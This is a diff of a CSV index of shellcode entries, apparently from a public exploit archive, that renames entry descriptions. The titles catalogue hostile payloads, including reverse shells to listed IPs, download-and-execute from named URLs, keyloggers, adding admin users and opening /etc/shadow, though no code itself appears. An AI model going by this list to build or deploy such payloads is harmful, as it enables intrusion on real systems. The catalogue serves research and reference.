-24318,shellcodes/windows/24318.c,"Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
+24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
 25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
-40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
+40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
 27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
-27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
-40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
+27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
+40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
 28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
-40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
+40334,shellcodes/windows_x86/40334.c,"Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
-40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
+40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
 34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
 34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
 34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
 34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
 35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
-35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
+35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
 35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
 35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
-35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
-35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
+35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
+35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
-36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
+36411,shellcodes/generator/36411.txt,"Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
 36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
 36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
 36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
-36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
-36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
+36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
 36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
-36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
+36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
 36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
-36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
-36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
+36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
+36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
 36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
-36779,shellcodes/windows_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
-36780,shellcodes/windows_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
+36779,shellcodes/windows_x86/36779.c,"Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
+36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
 36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
-36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
+36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
 36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
 36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
 36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
@@ -504,22 +504,22 @@ id,file,description,date,author,type,platform
 37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
 37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
 37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
-37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
+37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
 37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
-37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
+37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
 37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86
 37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
 37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
-37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
-37664,shellcodes/windows_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
-37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
-37758,shellcodes/windows_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
-37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
-37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
-38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
+37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
+37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
+37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
+37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
+37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
+37895,shellcodes/windows_x86-64/37895.asm,"Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
+38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
 38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
 38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
 38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
@@ -529,16 +529,16 @@ id,file,description,date,author,type,platform
 38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
 38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
 38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
-38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
+38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
 38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
-38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
+38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
 39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
 39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
 39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
 39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
-39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
-39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
-39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
+39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
+39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
+39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
 39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
 39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
@@ -547,7 +547,7 @@ id,file,description,date,author,type,platform
 39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
 39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
-39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
+39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
 39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
 39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
 39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
@@ -555,25 +555,25 @@ id,file,description,date,author,type,platform
 39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
 39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
 39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
-40094,shellcodes/windows_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
 39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
 39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
-39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
-39754,shellcodes/windows_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
+39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
+39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
 39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
-39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
+39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
 39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
 39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
-39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
+39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
-39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
-39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
-39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
-40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
+39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
+40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
 40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
